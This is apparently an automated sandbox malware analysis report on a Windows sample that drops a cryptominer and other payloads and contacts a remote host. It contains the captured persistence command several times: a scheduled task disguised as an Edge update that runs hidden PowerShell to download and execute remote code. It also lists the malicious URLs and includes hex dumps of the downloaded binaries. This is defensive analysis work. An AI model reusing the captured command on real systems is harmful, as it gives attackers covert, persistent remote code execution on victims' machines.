          Source: Process startedAuthor: Joe Security: Data: Command: schtasks /create /tn MicrosoftEdgeUpdateTaskMachineCore1d78ccbc12c9456 /sc MINUTE /MO 1 /tr "powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString(\\\""http://212.87.212.218/doanlowd.txt\\\"")", CommandLine: schtasks /create /tn MicrosoftEdgeUpdateTaskMachineCore1d78ccbc12c9456 /sc MINUTE /MO 1 /tr "powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString(\\\""http://212.87.212.218/doanlowd.txt\\\"")", CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\jxatBamQnK.exe" , ParentImage: C:\Users\user\Desktop\jxatBamQnK.exe, ParentProcessId: 6352, ParentProcessName: jxatBamQnK.exe, ProcessCommandLine: schtasks /create /tn MicrosoftEdgeUpdateTaskMachineCore1d78ccbc12c9456 /sc MINUTE /MO 1 /tr "powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString(\\\""http://212.87.212.218/doanlowd.txt\\\"")", ProcessId: 6816, ProcessName: schtasks.exe

          Persistence and Installation Behavior

          barindex
          Sigma detected: Schedule system process
          Source: Process startedAuthor: Joe Security: Data: Command: schtasks /create /tn MicrosoftEdgeUpdateTaskMachineCore1d78ccbc12c9456 /sc MINUTE /MO 1 /tr "powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString(\\\""http://212.87.212.218/doanlowd.txt\\\"")", CommandLine: schtasks /create /tn MicrosoftEdgeUpdateTaskMachineCore1d78ccbc12c9456 /sc MINUTE /MO 1 /tr "powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString(\\\""http://212.87.212.218/doanlowd.txt\\\"")", CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\jxatBamQnK.exe" , ParentImage: C:\Users\user\Desktop\jxatBamQnK.exe, ParentProcessId: 6352, ParentProcessName: jxatBamQnK.exe, ProcessCommandLine: schtasks /create /tn MicrosoftEdgeUpdateTaskMachineCore1d78ccbc12c9456 /sc MINUTE /MO 1 /tr "powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString(\\\""http://212.87.212.218/doanlowd.txt\\\"")", ProcessId: 6816, ProcessName: schtasks.exe

          Snort Signatures

          Timestamp:192.168.2.7104.140.201.42498104432831812 08/13/22-09:07:54.637918
          SID:2831812
          Source Port:49810
          Destination Port:443
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://212.87.212.218/id:Avira URL Cloud: Label: malware
          Source: http://212.87.212.218/idna:Avira URL Cloud: Label: malware
          Source: http://212.87.212.218/doanlowd.txtAvira URL Cloud: Label: malware
          Source: http://212.87.212.218/encrypt.exeAvira URL Cloud: Label: malware
          Source: http://212.87.212.218/daemon.exeAvira URL Cloud: Label: malware
          Source: http://212.87.212.218/scan.exeAvira URL Cloud: Label: malware
          Source: http://212.87.212.218/miner.exeAvira URL Cloud: Label: malware
          Antivirus detection for dropped file
          Source: C:\Windows\Temp\scan.exeAvira: detection malicious, Label: TR/AD.PSLoader.xbdrr
          Source: C:\Windows\Temp\miner.exeAvira: detection malicious, Label: HEUR/AGEN.1215032
          Source: C:\Windows\Temp\encrypt.exeAvira: detection malicious, Label: TR/Redcap.anyaz
          Source: C:\Windows\Temp\daemon.exeAvira: detection malicious, Label: HEUR/AGEN.1211808
          Multi AV Scanner detection for submitted file
          Source: jxatBamQnK.exeVirustotal: Detection: 61%Perma Link
          Source: jxatBamQnK.exeReversingLabs: Detection: 57%
          Antivirus / Scanner detection for submitted sample
          Source: jxatBamQnK.exeAvira: detected
          Multi AV Scanner detection for dropped file
          Source: C:\Windows\Temp\daemon.exeReversingLabs: Detection: 57%
          Source: C:\Windows\Temp\encrypt.exeMetadefender: Detection: 20%Perma Link
          Source: C:\Windows\Temp\encrypt.exeReversingLabs: Detection: 50%
          Source: C:\Windows\Temp\miner.exeMetadefender: Detection: 23%Perma Link
          Source: C:\Windows\Temp\miner.exeReversingLabs: Detection: 76%
          Source: C:\Windows\Temp\scan.exeMetadefender: Detection: 31%Perma Link
          Source: C:\Windows\Temp\scan.exeReversingLabs: Detection: 23%
          Machine Learning detection for sample
          Source: jxatBamQnK.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\Windows\Temp\miner.exeJoe Sandbox ML: detected
          Source: C:\Windows\Temp\encrypt.exeJoe Sandbox ML: detected
          Source: C:\Windows\Temp\daemon.exeJoe Sandbox ML: detected
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B28F58 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,56_2_00007FF650B28F58

          Bitcoin Miner

          barindex
          Yara detected Xmrig cryptocurrency miner
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: C:\Windows\Temp\miner.exe, type: DROPPED
          Found strings related to Crypto-Mining
          Source: miner.exe.35.drString found in binary or memory: FileDescriptionXMRig miner.
          Source: unknownHTTPS traffic detected: 20.82.209.183:443 -> 192.168.2.7:49718 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.82.209.183:443 -> 192.168.2.7:49719 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.190.159.3:443 -> 192.168.2.7:49765 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.126.32.72:443 -> 192.168.2.7:49767 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.182:443 -> 192.168.2.7:49769 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.7:49774 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.7:49775 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.7:49777 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.7:49776 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.7:49778 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.82.210.154:443 -> 192.168.2.7:49779 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.82.210.154:443 -> 192.168.2.7:49780 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.182:443 -> 192.168.2.7:49783 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.7:49784 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.7:49807 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.182:443 -> 192.168.2.7:49809 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.7:49811 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.7:49812 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.7:49813 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.7:49814 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.182:443 -> 192.168.2.7:49815 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.7:49816 version: TLS 1.2
          Source: jxatBamQnK.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000038.00000000.462772257.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 0000003C.00000000.472066491.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 0000003C.00000002.481443407.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 00000041.00000000.475181488.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 00000041.00000002.488837565.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 00000045.00000000.481048099.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 00000045.00000002.491894512.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 0000004A.00000000.488573417.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 0000004A.00000002.500694100.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 0000004D.00000000.492770561.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 0000004D.00000002.510319504.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 0000004E.00000002.506482905.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 0000004E.00000000.492480709.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 00000051.00000002.514894520.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp, rar.exe, 00000051.00000000.494359364.00007FF650B80000.00000002.00000001.01000000.00000009.sdmp
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B34AC0 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,56_2_00007FF650B34AC0
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B78550 FindFirstFileExA,56_2_00007FF650B78550
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B2E0E0 FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,56_2_00007FF650B2E0E0

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2831812 ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8) 192.168.2.7:49810 -> 104.140.201.42:443
          Source: global trafficHTTP traffic detected: GET /doanlowd.txt HTTP/1.1Host: 212.87.212.218Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /daemon.exe HTTP/1.1Host: 212.87.212.218
          Source: global trafficHTTP traffic detected: GET /doanlowd.txt HTTP/1.1Host: 212.87.212.218Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 13 Aug 2022 07:06:53 GMTContent-Type: application/octet-streamContent-Length: 1996800Last-Modified: Tue, 26 Jul 2022 11:35:52 GMTConnection: keep-aliveETag: "62dfd198-1e7800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 00 00 00 00 00 ee 50 00 00 00 00 00 f0 00 22 02 0b 02 03 00 00 80 1e 00 00 10 00 00 00 60 39 00 a0 e0 57 00 00 70 39 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 00 58 00 00 10 00 00 00 00 00 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 f0 57 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 60 39 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 80 1e 00 00 70 39 00 00 74 1e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 f0 57 00 00 02 00 00 00 76 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 33 2e 39 36 00 55 50 58 21 0d 24 08 0a b8 4d bf b3 6a 94 e8 51 ae c8 57 00 72 70 1e 00 00 f0 50 00 49 5a 00 ce ff ff ff ff ff 20 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 38 75 67 6a 77 5f 56 72 4f 73 4f 75 78 63 36 42 ff ff ff ff 31 52 4a 52 2f 48 4f 65 48 77 73 37 4e 2d 55 31 4d 69 58 65 4f 4a 69 4d 6d 2f 44 62 67 69 64 68 ff ff ff ff 6a 69 78 4b 42 42 71 53 73 38 54 56 77 53 2f 58 4a 6a 31 55 49 39 65 46 77 37 4a 64 70 7a 77 77 ff 0f 21 ff 71 74 39 22 0a 20 ff cc 49 3b 66 10 76 38 48 83 ec 18 48 ff 6f de fd 89 6c 24 10 48 8d 09 89 44 24 20 5c 24 28 66 90 e8 5a 00 07 1c 48 8b de 99 ef 74 21 8b 1c 00 dc 53 83 c4 18 c3 74 67 ab 54 08 10 30 05 fd 1d 8b 6f 9f 7f fb eb a7 c9 4c 8d 64 24 d8 4d 0f 86 74 06 e3 48 81 7e d2 dd da ec a8 82 00 64 ac 24 a0 0f 8d 89 84 24 b0 7d 7b bb 7d eb 06 12 f0 4c 89 ae 85 db 0f 84 5e 03 3a 31 c9 e9 6f ff 76 bf 0c 04 ad 48 c7 c1 ff 00 2c c9 7d 0e 45 31 c0 31 f6 4c d9 eb 31 0f 73 db de db 1f 40 72 39 d9 0f 87 b2 da 94 71 01 18 f3 0f 82 f8 db 7f fb cf 48 29 cb 1e 7b ff 49 89 f8 48 f7 df 48 76 3f 48 21 fe 48 01 c6 e9 da ff 2f 66 f9 04 7c 9d 81 38 63 70 75 2e 75 95 31 d2 80 00 bd ca 9a 1d fc a5 c2 89 74 24 70 4c a4 50 d0 36 8c 7d db a5 dd 32 02 e6
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 13 Aug 2022 07:06:58 GMTContent-Type: application/octet-streamContent-Length: 1699840Last-Modified: Mon, 08 Aug 2022 02:07:13 GMTConnection: keep-aliveETag: "62f06fd1-19f000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 00 00 00 00 00 36 48 00 00 00 00 00 f0 00 22 02 0b 02 03 00 00 f0 19 00 00 10 00 00 00 50 35 00 30 48 4f 00 00 60 35 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 60 4f 00 00 10 00 00 00 00 00 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 4f 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 50 35 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 f0 19 00 00 60 35 00 00 ec 19 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 50 4f 00 00 02 00 00 00 ee 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 33 2e 39 36 00 55 50 58 21 0d 24 08 0a d6 60 ad 2e 1e 03 e8 59 00 2b 4f 00 0b e8 19 00 00 38 48 00 49 36 00 59 ff ff ff ff ff 20 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 36 58 35 57 6f 4f 41 32 56 64 79 73 53 41 39 4c ff ff ff ff 47 59 59 4a 2f 49 34 71 5a 6e 57 50 79 65 59 76 6b 68 63 7a 48 7a 31 41 35 2f 5f 75 34 36 32 49 ff ff ff ff 64 6e 66 33 53 49 61 39 58 37 2d 69 65 39 2f 73 4b 4d 59 55 4f 6a 42 66 5f 4a 76 4d 54 59 45 43 ff 0f 21 ff 47 79 52 22 0a 20 ff cc 49 3b 66 10 76 38 48 83 ec 18 48 ff 6f de fd 89 6c 24 10 48 8d 09 89 44 24 20 5c 24 28 66 90 e8 36 00 07 1c 48 8b de 99 ef 74 21 8b 1c 00 dc 53 83 c4 18 c3 a5 72 ab 54 08 10 4e 05 fd bc 08 df 3e ff 76 10 eb a7 c9 4c 8d 64 24 d8 4d 0f 86 74 06 e3 48 81 ec fc a4 bb b5 a8 82 00 64 ac 24 a0 0f 8d 89 84 24 b0 fb f6 76 fb eb 06 12 f0 4c 89 ae 85 db 0f 84 5e 03 3a 31 c9 e9 0c df fe ed 7e 04 ad 48 c7 c1 ff 00 2c c9 7d 0e 45 31 c0 31 f6 4c d9 eb 31 0f 1f e7 b6 bd b7 40 72 39 d9 0f 87 b2 da 94 71 01 18 f3 0f 82 f0 b7 ff f6 cf 48 29 cb 1e 7b ff 49 89 f8 48 f7 df 48 76 3f 48 21 fe 48 01 c6 d3 b5 ff 5f 66 f9 04 7c 9d 81 38 63 70 75 2e 75 95 31 d2 80 00 bd ca 35 3b f8 4b c2 89 74 24 70 4c a4 50 d0 36 8c fb b6 4b bb 32 02
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 13 Aug 2022 07:07:15 GMTContent-Type: application/octet-streamContent-Length: 4741120Last-Modified: Mon, 08 Aug 2022 02:00:25 GMTConnection: keep-aliveETag: "62f06e39-485800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 00 00 00 00 00 98 dd 00 00 00 00 00 f0 00 22 02 0b 02 03 00 00 60 48 00 00 10 00 00 00 10 9e 00 d0 71 e6 00 00 20 9e 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 90 e6 00 00 10 00 00 00 00 00 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 e6 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 10 9e 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 60 48 00 00 20 9e 00 00 54 48 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 80 e6 00 00 02 00 00 00 56 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 33 2e 39 36 00 55 50 58 21 0d 24 08 0a 92 ba 51 92 a1 d9 9d 4a b5 5c e6 00 a6 51 48 00 00 9a dd 00 00 00 00 ad ff ff ff ff ff 20 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 4b 49 38 4b 70 79 38 41 6c 38 6c 55 58 42 73 45 ff ff ff ff 52 46 53 39 2f 74 7a 4b 5a 5a 49 4e 68 48 64 7a 62 51 43 52 67 54 75 49 66 2f 63 74 53 45 46 78 bf fd ff ff 61 42 6c 4f 4a 44 67 64 4a 6d 2d 36 47 51 2f 34 77 6d 71 67 71 77 76 50 66 56 54 42 75 ff 87 d8 ff 67 56 57 6d 30 22 0a 20 ff cc 01 49 3b 66 10 76 38 48 83 ec 18 ff 37 ef fe 48 89 6c 24 10 48 8d 09 89 44 24 20 5c 24 28 66 90 e8 7b 06 00 00 48 79 e7 7e ba 8b 21 8b e8 2c 00 1d 53 83 c4 18 c3 5d f9 be 52 08 10 e8 d3 13 06 4f 08 10 eb a7 dd ef cf bf c9 4c 8d 64 24 d8 4d 0f 86 f8 05 74 81 ec a8 83 89 ed f3 93 ee ac 24 a0 0f 8d 89 84 24 b0 eb 06 12 f0 f7 fb f6 db 4c 89 ae 85 db 0f 84 1f 02 20 31 c9 e9 8b 03 3e c7 c1 ff 00 be fd f6 6f 2c c9 7d 0e 45 31 c0 31 f6 4c d9 eb 31 0f 1f 40 32 39 d9 0f 87 95 df 56 de ee b3 8d 71 01 18 f3 0f 82 7d 29 cb 1e 7b ff 49 89 f8 ff 0b fe f6 48 f7 df 48 76 3f 48 21 fe 48 01 c6 66 f9 04 7c 9d 81 38 63 70 75 2e f0 97 ef f6 75 95 31 d2 80 00 e9 49 bd c2 89 74 24 70 4c 9a d6 6e 76 a4 50 d0 36 8c 4b 01 32 90 be ca 1c
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 13 Aug 2022 07:07:43 GMTContent-Type: application/octet-streamContent-Length: 2474496Last-Modified: Mon, 18 May 2020 15:20:04 GMTConnection: keep-aliveETag: "5ec2a7a4-25c200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 44 53 c2 5e 00 00 00 00 00 00 00 00 f0 00 2f 02 0b 02 02 22 00 60 25 00 00 60 00 00 00 b0 70 00 b0 1b 96 00 00 c0 70 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 80 96 00 00 10 00 00 00 00 00 00 03 00 00 00 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec 7c 96 00 dc 02 00 00 00 20 96 00 ec 5c 00 00 00 f0 5c 00 38 aa 02 00 00 00 00 00 00 00 00 00 c8 7f 96 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1d 96 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 b0 70 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 60 25 00 00 c0 70 00 00 60 25 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 60 00 00 00 20 96 00 00 60 00 00 00 62 25 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 33 2e 39 36 00 55 50 58 21 0d 24 08 07 88 a5 58 27 59 83 37 56 73 fe 95 00 7e 5b 25 00 00 6e 63 00 00 00 00 4d ff bf 29 ff c3 66 66 2e 0f 1f 84 00 0e 40 00 48 83 ec 28 48 8b 05 a5 3d 5b 00 31 e4 d8 79 f7 c9 c7 00 01 2c 1c a6 19 a9 7f 73 40 06 6c 4f 35 66 81 38 4d 5a 75 0f 9f b7 6d fe 48 63 50 3c 48 01 d0 50 45 34 74 69 52 32 89 0d ef f6 ee ff 98 cf 62 00 8b 00 85 c0 75 46 b9 69 e8 94 aa 34 08 a7 b3 34 7c 15 07 39 fb cd 10 37 8b 12 89 10 e8 87 1f e0 36 d0 33 b8 e0 6f 76 bd 60 21 83 38 01 74 53 31 c0 4c c4 28 c3 78 f7 e9 36 5f b9 02 8b 4e eb b8 1f 0f b7 50 18 37 f8 ae 2d 04 fa 0b 4a 45 0d 02 75 85 83 b8 bb 0e 0f 86 ee 2f b8 db 78 ff 00 8b 90 f8 18 b2 85 d2 0f 95 c1 e9 66 22 cc 6e 6f d7 68 80 22 bc 8d 0d 01 d1 ca e8 cc d7 08 bd be 3f ef 76 44 2e 83 78 74 74 3d 44 8b 80 e8 77 45 e0 e1 d3 09 7a 79 29 66 90 5e 38 f8 fb fe b3 54 05 85 4c 8d 05 c6 ce 62 92 15 c7 0d 0d c8 ce f7 4a 73 37 d7 89 05 9c 1d 38 95 89 44 24 20 5e f0 13 bc 9d 15 a0 08 e8 a5 a9 70 86 c4 38 c3 eb be ff 5f 0f 41 55 41 54 55 57 56 53 48 81 ec 98 1c b9 0d e5 c0 b4 82 ca ed 3f 6c 4c 89 c7 f3 48 ab 78 3d e8 3b 0f 0e fe e2 76 f0 c9 0f 85 ac fe 65 26 04 25 30 05 1d 3c 34 5b 3f 68 f8 ff 0c 70 08 31 ed 4c 8b 25 f3
          Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
          Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4740Host: login.live.com
